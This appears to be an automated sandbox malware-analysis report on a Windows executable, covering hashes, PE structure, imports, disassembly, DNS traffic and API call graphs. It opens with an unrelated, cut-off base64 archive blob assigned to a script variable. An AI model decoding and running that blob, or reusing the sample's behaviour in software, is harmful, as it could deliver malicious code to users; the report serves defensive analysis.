$temp='UEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHOtkk1LA0EMhu/9FUPu3WwriMjO9iJCbyL1B4SZ7O7Qzgczaa3/3kEKulCKoMe8efPwHNJtzv6gTpyLi0HDqmlBcTDRujBqeNs9Lx9g0y+6Vz6Q1EqZXCqq3oSiYRJJj4jFTOypNDFxqJshZk9SxzxiIrOnkXHdtveYfzKgnzHV1mrIW7sCtftI/Dc2ehayJIQmZl6mXK+zOC4VTnlk0WCjealx+Wo0lQx4XWj9e6E4DM7wUzRHz0GuefFZOFi2t5UopVtGd/9pNG98y7zHbNFe4ovNosPZG/SfUEsHCOjQASPZAAAAPQIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAGRvY1Byb3BzL2NvcmUueG1sbVJbS8MwFH73V5S8t+kFZZS2A5U9ORA2UXyLyVkXbdKQnK3bvzdtt7rhoA/nu/Q7OScp5gfVBHuwTra6JEkUkwA0b4XUdUne1otwRgKHTAvWtBpKcgRH5tVdwU3OWwuvtjVgUYILfJB2OTcl2SKanFLHt6CYi7xDe3HTWsXQQ1tTw/gPq4GmcfxAFSATDBntA0MzJ

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.754206235972524
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:HSZXPMB7kS.exe
      File size:334'347 bytes
      MD5:d6f5ca5da79a7eb267670cc0e6f5d590
      SHA1:6d62f339e2bb9b107b0309663d30e4e4647e4b5d
      SHA256:2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd
      SHA512:f0b1298f64aee6f683b5d985c1fcb8a5f2ac4d15a1e0a7c372f991c1a4e6b4152425506ad13cc11b04696ed9ff43e16d3419c2aced2dab4c2c80207834a2caa3
      SSDEEP:6144:ntH/xNLaAOvIBd7lAAxWS1elIoSN6WX+t45q3niV0:ntH5NLaAdDhAAEIFcWX+t4o3iV0
      TLSH:FA64C0027AC185B2D57328331A399F21A67D7C301F758EDB9394695EDE321C09B32BA7
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w..<.V..w..<.T..w..<.U..w....Z..w.......w.......w.......w....$..w....4..w...w...v.......w.......w....X..w.......w.

      File Icon

      Icon Hash:1515d4d4442f2d2d

      Static PE Info

      General

      Entrypoint:0x420780
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Time Stamp:0x6474CCD4 [Mon May 29 16:03:32 2023 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:1
      File Version Major:5
      File Version Minor:1
      Subsystem Version Major:5
      Subsystem Version Minor:1
      Import Hash:0ae9e38912ff6bd742a1b9e5c003576a

      Entrypoint Preview

      Instruction
      call 00007FBE219B916Bh
      jmp 00007FBE219B8B1Dh
      int3
      int3
      int3
      int3
      int3
      int3
      push 00423A80h
      push dword ptr fs:[00000000h]
      mov eax, dword ptr [esp+10h]
      mov dword ptr [esp+10h], ebp
      lea ebp, dword ptr [esp+10h]
      sub esp, eax
      push ebx
      push esi
      push edi
      mov eax, dword ptr [004407A8h]
      xor dword ptr [ebp-04h], eax
      xor eax, ebp
      push eax
      mov dword ptr [ebp-18h], esp
      push dword ptr [ebp-08h]
      mov eax, dword ptr [ebp-04h]
      mov dword ptr [ebp-04h], FFFFFFFEh
      mov dword ptr [ebp-08h], eax
      lea eax, dword ptr [ebp-10h]
      mov dword ptr fs:[00000000h], eax
      ret
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      mov ecx, dword ptr [ebp-10h]
      mov dword ptr fs:[00000000h], ecx
      pop ecx
      pop edi
      pop edi
      pop esi
      pop ebx
      mov esp, ebp
      pop ebp
      push ecx
      ret
      push ebp
      mov ebp, esp
      sub esp, 0Ch
      lea ecx, dword ptr [ebp-0Ch]
      call 00007FBE219AB9B1h
      push 0043D14Ch
      lea eax, dword ptr [ebp-0Ch]
      push eax
      call 00007FBE219BB7C5h
      int3
      jmp 00007FBE219BD698h
      push ebp
      mov ebp, esp
      and dword ptr [00463D58h], 00000000h
      sub esp, 24h
      or dword ptr [004407A0h], 01h
      push 0000000Ah
      call dword ptr [004341C4h]
      test eax, eax
      je 00007FBE219B8E52h
      and dword ptr [ebp-10h], 00000000h
      xor eax, eax
      push ebx
      push esi
      push edi
      xor ecx, ecx
      lea edi, dword ptr [ebp-24h]

      Rich Headers

      Programming Language:
      • [ C ] VS2008 SP1 build 30729
      • [IMP] VS2008 SP1 build 30729

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x3e3800x34.rdata
      IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3b40x50.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000xdff8.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000x23dc.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x3c1b00x54.rdata
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x366a80x40.rdata
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x340000x278.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3d85c0x120.rdata
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x32dbc0x32e0059fca22eb14bf065790ccabf936fb764False0.5921807816339066data6.705384121865264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0x340000xb1d00xb2003d7416119125f570d6c385b5ba208d7aFalse0.46034497893258425data5.270635796862559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0x400000x247500x1200edc39ed5cd62e969c2b4607a1a95cf98False0.4058159722222222data4.083550519415643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .didat0x650000x1a40x200185ed7102f068a73891dd850643e3d14False0.46484375data3.50335535460232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rsrc0x660000xdff80xe000699399d7d2e63f9a36984a221fc02f75False0.6373465401785714data6.63871928699419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x740000x23dc0x2400539b0c53eda4d1d9ffe2e69d5037d71fFalse0.7864583333333334data6.678617573231213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountryZLIB Complexity
      PNG0x666500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
      PNG0x671980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
      RT_ICON0x687480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
      RT_ICON0x68cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
      RT_ICON0x695580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
      RT_ICON0x6a4000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
      RT_ICON0x6a8680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
      RT_ICON0x6b9100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
      RT_ICON0x6deb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
      RT_DIALOG0x725880x286dataEnglishUnited States0.5092879256965944
      RT_DIALOG0x723580x13adataEnglishUnited States0.60828025477707
      RT_DIALOG0x724980xecdataEnglishUnited States0.6991525423728814
      RT_DIALOG0x722280x12edataEnglishUnited States0.5927152317880795
      RT_DIALOG0x71ef00x338dataEnglishUnited States0.45145631067961167
      RT_DIALOG0x71c980x252dataEnglishUnited States0.5757575757575758
      RT_STRING0x72f680x1e2dataEnglishUnited States0.3900414937759336
      RT_STRING0x731500x1ccdataEnglishUnited States0.4282608695652174
      RT_STRING0x733200x1b8dataEnglishUnited States0.45681818181818185
      RT_STRING0x734d80x146dataEnglishUnited States0.5153374233128835
      RT_STRING0x736200x46cdataEnglishUnited States0.3454063604240283
      RT_STRING0x73a900x166dataEnglishUnited States0.49162011173184356
      RT_STRING0x73bf80x152dataEnglishUnited States0.5059171597633136
      RT_STRING0x73d500x10adataEnglishUnited States0.49624060150375937
      RT_STRING0x73e600xbcdataEnglishUnited States0.6329787234042553
      RT_STRING0x73f200xd6dataEnglishUnited States0.5747663551401869
      RT_GROUP_ICON0x71c300x68dataEnglishUnited States0.7019230769230769
      RT_MANIFEST0x728100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

      Imports

      DLLImport
      KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
      gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      EnglishUnited States

      Network Behavior

      Network Port Distribution

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 30, 2024 15:31:52.755042076 CEST5355415162.159.36.2192.168.2.8
      Sep 30, 2024 15:31:53.249387026 CEST5469653192.168.2.81.1.1.1
      Sep 30, 2024 15:31:53.258507013 CEST53546961.1.1.1192.168.2.8
      Sep 30, 2024 15:31:54.946047068 CEST5326453192.168.2.81.1.1.1
      Sep 30, 2024 15:31:54.953948975 CEST53532641.1.1.1192.168.2.8

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Sep 30, 2024 15:31:53.249387026 CEST192.168.2.81.1.1.10x4122Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
      Sep 30, 2024 15:31:54.946047068 CEST192.168.2.81.1.1.10xf3abStandard query (0)183.59.114.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Sep 30, 2024 15:31:53.258507013 CEST1.1.1.1192.168.2.80x4122Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
      Sep 30, 2024 15:31:54.953948975 CEST1.1.1.1192.168.2.80xf3abName error (3)183.59.114.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      System Behavior

      General

      Target ID:1
      Start time:09:31:20
      Start date:30/09/2024
      Path:C:\Users\user\Desktop\HSZXPMB7kS.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\HSZXPMB7kS.exe"
      Imagebase:0x120000
      File size:334'347 bytes
      MD5 hash:D6F5CA5DA79A7EB267670CC0E6F5D590
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Disassembly

      Reset < >

        Execution Graph

        Execution Coverage:9.3%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:9.9%
        Total number of Nodes:1551
        Total number of Limit Nodes:43
        execution_graph 26117 13d410 92 API calls _swprintf 24114 14a610 24122 14bf5f 24114->24122 24117 14a624 24119 14a62c 24120 14a639 24119->24120 24130 14a640 11 API calls 24119->24130 24131 14be48 24122->24131 24125 14bf9e TlsAlloc 24126 14bf8f 24125->24126 24138 140d6c 24126->24138 24128 14a61a 24128->24117 24129 14a589 20 API calls _free 24128->24129 24129->24119 24130->24117 24132 14be78 24131->24132 24135 14be74 24131->24135 24132->24125 24132->24126 24133 14be98 24133->24132 24136 14bea4 GetProcAddress 24133->24136 24135->24132 24135->24133 24145 14bee4 24135->24145 24137 14beb4 _free 24136->24137 24137->24132 24139 140d74 24138->24139 24140 140d75 IsProcessorFeaturePresent 24138->24140 24139->24128 24142 140db7 24140->24142 24152 140d7a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24142->24152 24144 140e9a 24144->24128 24146 14bf05 LoadLibraryExW 24145->24146 24151 14befa 24145->24151 24147 14bf22 GetLastError 24146->24147 24148 14bf3a 24146->24148 24147->24148 24149 14bf2d LoadLibraryExW 24147->24149 24150 14bf51 FreeLibrary 24148->24150 24148->24151 24149->24148 24150->24151 24151->24135 24152->24144 24211 13f31b 14 API calls ___delayLoadHelper2@8 26118 13741e 138 API calls __InternalCxxFrameHandler 26175 14961a 55 API calls _free 24214 13f41c 24215 13f325 24214->24215 24216 13f9d9 ___delayLoadHelper2@8 14 API calls 24215->24216 24216->24215 26119 121800 87 API calls Concurrency::cancel_current_task 26120 13b400 GdipDisposeImage GdipFree 24247 14d201 31 API calls CatchGuardHandler 26191 13c306 GetDlgItem EnableWindow ShowWindow SendMessageW 24249 140602 24250 14060e ___scrt_is_nonwritable_in_current_image 24249->24250 24281 14019c 24250->24281 24252 140615 24253 140768 24252->24253 24256 14063f 24252->24256 24358 1409fa 4 API calls 2 library calls 24253->24358 24255 14076f 24351 14930a 24255->24351 24268 14067e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24256->24268 24292 149ead 24256->24292 24263 14065e 24265 1406df 24300 140b15 GetStartupInfoW __cftof 24265->24300 24267 1406e5 24301 149dfe 51 API calls 24267->24301 24268->24265 24354 148dfc 38 API calls 2 library calls 24268->24354 24271 1406ed 24302 13f04c 24271->24302 24275 140701 24275->24255 24276 140705 24275->24276 24277 14070e 24276->24277 24356 1492ad 28 API calls _abort 24276->24356 24357 14030d 12 API calls ___scrt_uninitialize_crt 24277->24357 24280 140716 24280->24263 24282 1401a5 24281->24282 24360 140816 IsProcessorFeaturePresent 24282->24360 24284 1401b1 24361 143bde 24284->24361 24286 1401b6 24287 1401ba 24286->24287 24369 149d37 24286->24369 24287->24252 24290 1401d1 24290->24252 24295 149ec4 24292->24295 24293 140d6c CatchGuardHandler 5 API calls 24294 140658 24293->24294 24294->24263 24296 149e51 24294->24296 24295->24293 24297 149e80 24296->24297 24298 140d6c CatchGuardHandler 5 API calls 24297->24298 24299 149ea9 24298->24299 24299->24268 24300->24267 24301->24271 24483 131b7c 24302->24483 24306 13f06c 24532 13bd0b 24306->24532 24308 13f075 __cftof 24309 13f088 GetCommandLineW 24308->24309 24310 13f09b 24309->24310 24311 13f12c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24309->24311 24536 13d6f8 24310->24536 24547 124a20 24311->24547 24316 13f126 24541 13ed1e 24316->24541 24317 13f0a9 OpenFileMappingW 24321 13f0c1 MapViewOfFile 24317->24321 24322 13f11d CloseHandle 24317->24322 24324 13f0d2 __InternalCxxFrameHandler 24321->24324 24325 13f116 UnmapViewOfFile 24321->24325 24322->24311 24328 13ed1e 2 API calls 24324->24328 24325->24322 24330 13f0ee 24328->24330 24580 130695 83 API calls 24330->24580 24331 13a0c7 27 API calls 24333 13f1f3 DialogBoxParamW 24331->24333 24337 13f22d 24333->24337 24334 13f102 24581 13074b 83 API calls _wcslen 24334->24581 24336 13f10d 24336->24325 24338 13f246 24337->24338 24339 13f23f Sleep 24337->24339 24342 13f254 24338->24342 24582 13bfa3 CompareStringW SetCurrentDirectoryW __cftof _wcslen 24338->24582 24339->24338 24341 13f273 DeleteObject 24343 13f288 DeleteObject 24341->24343 24344 13f28f 24341->24344 24342->24341 24343->24344 24345 13f2d2 24344->24345 24346 13f2c0 24344->24346 24577 13bd71 24345->24577 24583 13ed7b 6 API calls 24346->24583 24349 13f2c6 CloseHandle 24349->24345 24350 13f30c 24355 140b4b GetModuleHandleW 24350->24355 24856 149087 24351->24856 24354->24265 24355->24275 24356->24277 24357->24280 24358->24255 24360->24284 24373 144c87 24361->24373 24364 143be7 24364->24286 24366 143bef 24367 143bfa 24366->24367 24387 144cc3 DeleteCriticalSection 24366->24387 24367->24286 24414 14d20a 24369->24414 24372 143bfd 7 API calls 2 library calls 24372->24287 24374 144c90 24373->24374 24376 144cb9 24374->24376 24377 143be3 24374->24377 24388 144ecc 24374->24388 24393 144cc3 DeleteCriticalSection 24376->24393 24377->24364 24379 143d0c 24377->24379 24407 144ddd 24379->24407 24382 143d21 24382->24366 24384 143d2f 24385 143d3c 24384->24385 24413 143d3f 6 API calls ___vcrt_FlsFree 24384->24413 24385->24366 24387->24364 24394 144cf2 24388->24394 24391 144f04 InitializeCriticalSectionAndSpinCount 24392 144eef 24391->24392 24392->24374 24393->24377 24395 144d0f 24394->24395 24396 144d13 24394->24396 24395->24391 24395->24392 24396->24395 24397 144d7b GetProcAddress 24396->24397 24400 144d6c 24396->24400 24402 144d92 LoadLibraryExW 24396->24402 24397->24395 24399 144d89 24397->24399 24399->24395 24400->24397 24401 144d74 FreeLibrary 24400->24401 24401->24397 24403 144da9 GetLastError 24402->24403 24404 144dd9 24402->24404 24403->24404 24405 144db4 ___vcrt_InitializeCriticalSectionEx 24403->24405 24404->24396 24405->24404 24406 144dca LoadLibraryExW 24405->24406 24406->24396 24408 144cf2 ___vcrt_InitializeCriticalSectionEx 5 API calls 24407->24408 24409 144df7 24408->24409 24410 144e10 TlsAlloc 24409->24410 24411 143d16 24409->24411 24411->24382 24412 144e8e 6 API calls ___vcrt_InitializeCriticalSectionEx 24411->24412 24412->24384 24413->24382 24416 14d223 24414->24416 24418 14d227 24414->24418 24415 140d6c CatchGuardHandler 5 API calls 24417 1401c3 24415->24417 24416->24415 24417->24290 24417->24372 24418->24416 24420 14b850 24418->24420 24421 14b85c ___scrt_is_nonwritable_in_current_image 24420->24421 24432 14bde1 EnterCriticalSection 24421->24432 24423 14b863 24433 14d6d8 24423->24433 24425 14b872 24430 14b881 24425->24430 24446 14b6d9 29 API calls 24425->24446 24428 14b87c 24447 14b78f GetStdHandle GetFileType 24428->24447 24448 14b89d LeaveCriticalSection _abort 24430->24448 24431 14b892 _abort 24431->24418 24432->24423 24434 14d6e4 ___scrt_is_nonwritable_in_current_image 24433->24434 24435 14d6f1 24434->24435 24436 14d708 24434->24436 24457 14a7db 20 API calls _free 24435->24457 24449 14bde1 EnterCriticalSection 24436->24449 24439 14d6f6 24458 1451a9 26 API calls ___std_exception_copy 24439->24458 24441 14d740 24459 14d767 LeaveCriticalSection _abort 24441->24459 24442 14d700 _abort 24442->24425 24445 14d714 24445->24441 24450 14d629 24445->24450 24446->24428 24447->24430 24448->24431 24449->24445 24460 14c2e6 24450->24460 24452 14d63b 24456 14d648 24452->24456 24467 14c0ba 24452->24467 24454 14d69a 24454->24445 24474 14a65a 24456->24474 24457->24439 24458->24442 24459->24442 24465 14c2f3 _free 24460->24465 24461 14c333 24481 14a7db 20 API calls _free 24461->24481 24462 14c31e RtlAllocateHeap 24464 14c331 24462->24464 24462->24465 24464->24452 24465->24461 24465->24462 24480 148e4c 7 API calls 2 library calls 24465->24480 24468 14be48 _free 5 API calls 24467->24468 24469 14c0e1 24468->24469 24470 14c0ff InitializeCriticalSectionAndSpinCount 24469->24470 24471 14c0ea 24469->24471 24470->24471 24472 140d6c CatchGuardHandler 5 API calls 24471->24472 24473 14c116 24472->24473 24473->24452 24475 14a665 RtlFreeHeap 24474->24475 24479 14a68e _free 24474->24479 24476 14a67a 24475->24476 24475->24479 24482 14a7db 20 API calls _free 24476->24482 24478 14a680 GetLastError 24478->24479 24479->24454 24480->24465 24481->24464 24482->24478 24584 13ffc0 24483->24584 24486 131ba1 GetProcAddress 24489 131bd2 GetProcAddress 24486->24489 24490 131bba 24486->24490 24487 131c00 24488 131f2d GetModuleFileNameW 24487->24488 24595 1489de 42 API calls __vsnwprintf_l 24487->24595 24499 131f4b 24488->24499 24492 131be4 24489->24492 24490->24489 24492->24487 24493 131e6d 24493->24488 24494 131e78 GetModuleFileNameW CreateFileW 24493->24494 24495 131f21 CloseHandle 24494->24495 24496 131ea8 SetFilePointer 24494->24496 24495->24488 24496->24495 24497 131eb6 ReadFile 24496->24497 24497->24495 24501 131ed4 24497->24501 24502 131fad GetFileAttributesW 24499->24502 24503 131fc5 24499->24503 24505 131f76 CompareStringW 24499->24505 24586 12c619 24499->24586 24589 131b34 24499->24589 24501->24495 24504 131b34 2 API calls 24501->24504 24502->24499 24502->24503 24506 131fd0 24503->24506 24509 132005 24503->24509 24504->24501 24505->24499 24508 131fe9 GetFileAttributesW 24506->24508 24510 132001 24506->24510 24507 132114 24531 13b64d GetCurrentDirectoryW 24507->24531 24508->24506 24508->24510 24509->24507 24511 12c619 GetVersionExW 24509->24511 24510->24509 24512 13201f 24511->24512 24513 132026 24512->24513 24514 13208c 24512->24514 24515 131b34 2 API calls 24513->24515 24516 124a20 _swprintf 51 API calls 24514->24516 24518 132030 24515->24518 24517 1320b4 AllocConsole 24516->24517 24519 1320c1 GetCurrentProcessId AttachConsole 24517->24519 24520 13210c ExitProcess 24517->24520 24521 131b34 2 API calls 24518->24521 24600 144f93 24519->24600 24523 13203a 24521->24523 24596 12f937 24523->24596 24524 1320e2 GetStdHandle WriteConsoleW Sleep FreeConsole 24524->24520 24527 124a20 _swprintf 51 API calls 24528 132068 24527->24528 24529 12f937 53 API calls 24528->24529 24530 132077 24529->24530 24530->24520 24531->24306 24533 131b34 2 API calls 24532->24533 24534 13bd1f OleInitialize 24533->24534 24535 13bd42 GdiplusStartup SHGetMalloc 24534->24535 24535->24308 24537 13d702 24536->24537 24538 1332f7 CharUpperW 24537->24538 24539 13d818 24537->24539 24625 13074b 83 API calls _wcslen 24537->24625 24538->24537 24539->24316 24539->24317 24542 13ffc0 24541->24542 24543 13ed2b SetEnvironmentVariableW 24542->24543 24545 13ed4e 24543->24545 24544 13ed76 24544->24311 24545->24544 24546 13ed6a SetEnvironmentVariableW 24545->24546 24546->24544 24626 1249f3 24547->24626 24550 13c8bd LoadBitmapW 24551 13c8eb GetObjectW 24550->24551 24552 13c8de 24550->24552 24553 13c8fa 24551->24553 24694 13b6c2 FindResourceW 24552->24694 24689 13b5c6 24553->24689 24558 13c950 24569 12ed62 24558->24569 24559 13c92c 24710 13b605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24559->24710 24560 13b6c2 13 API calls 24562 13c91d 24560->24562 24562->24559 24564 13c923 DeleteObject 24562->24564 24563 13c934 24711 13b5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24563->24711 24564->24559 24566 13c93d 24712 13b80c 9 API calls 24566->24712 24568 13c944 DeleteObject 24568->24558 24723 12ed87 24569->24723 24574 13a0c7 24575 13feae 27 API calls 24574->24575 24576 13a0e6 24575->24576 24576->24331 24578 13bda0 GdiplusShutdown CoUninitialize 24577->24578 24578->24350 24580->24334 24581->24336 24582->24342 24583->24349 24585 131b86 GetModuleHandleW 24584->24585 24585->24486 24585->24487 24587 12c62d GetVersionExW 24586->24587 24588 12c669 24586->24588 24587->24588 24588->24499 24590 13ffc0 24589->24590 24591 131b41 GetSystemDirectoryW 24590->24591 24592 131b77 24591->24592 24593 131b59 24591->24593 24592->24499 24594 131b6a LoadLibraryW 24593->24594 24594->24592 24595->24493 24597 12f947 24596->24597 24602 12f968 24597->24602 24601 144f9b 24600->24601 24601->24524 24601->24601 24608 12ecd0 24602->24608 24605 12f965 24605->24527 24606 12f98b LoadStringW 24606->24605 24607 12f9a2 LoadStringW 24606->24607 24607->24605 24613 12ec0c 24608->24613 24610 12eced 24611 12ed02 24610->24611 24621 12ed10 26 API calls 24610->24621 24611->24605 24611->24606 24614 12ec24 24613->24614 24620 12eca4 _strncpy 24613->24620 24616 12ec48 24614->24616 24622 1330e5 WideCharToMultiByte 24614->24622 24619 12ec79 24616->24619 24623 12f8d1 50 API calls __vsnprintf 24616->24623 24624 147561 26 API calls 3 library calls 24619->24624 24620->24610 24621->24611 24622->24616 24623->24619 24624->24620 24625->24537 24627 124a0a __vsnwprintf_l 24626->24627 24630 1472d2 24627->24630 24633 145395 24630->24633 24634 1453d5 24633->24634 24635 1453bd 24633->24635 24634->24635 24636 1453dd 24634->24636 24650 14a7db 20 API calls _free 24635->24650 24652 145934 24636->24652 24638 1453c2 24651 1451a9 26 API calls ___std_exception_copy 24638->24651 24642 1453cd 24643 140d6c CatchGuardHandler 5 API calls 24642->24643 24645 124a14 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24643->24645 24645->24550 24646 145465 24661 145ce4 51 API calls 3 library calls 24646->24661 24649 145470 24662 1459b7 20 API calls _free 24649->24662 24650->24638 24651->24642 24653 1453ed 24652->24653 24654 145951 24652->24654 24660 1458ff 20 API calls 2 library calls 24653->24660 24654->24653 24663 14a505 GetLastError 24654->24663 24656 145972 24683 14aae6 38 API calls __cftof 24656->24683 24658 14598b 24684 14ab13 38 API calls __cftof 24658->24684 24660->24646 24661->24649 24662->24642 24664 14a521 24663->24664 24665 14a51b 24663->24665 24667 14c2e6 _free 20 API calls 24664->24667 24669 14a570 SetLastError 24664->24669 24685 14c00b 11 API calls 2 library calls 24665->24685 24668 14a533 24667->24668 24670 14a53b 24668->24670 24686 14c061 11 API calls 2 library calls 24668->24686 24669->24656 24672 14a65a _free 20 API calls 24670->24672 24674 14a541 24672->24674 24673 14a550 24673->24670 24675 14a557 24673->24675 24676 14a57c SetLastError 24674->24676 24687 14a370 20 API calls _free 24675->24687 24688 14a0e4 38 API calls _abort 24676->24688 24678 14a562 24680 14a65a _free 20 API calls 24678->24680 24682 14a569 24680->24682 24682->24669 24682->24676 24683->24658 24684->24653 24685->24664 24686->24673 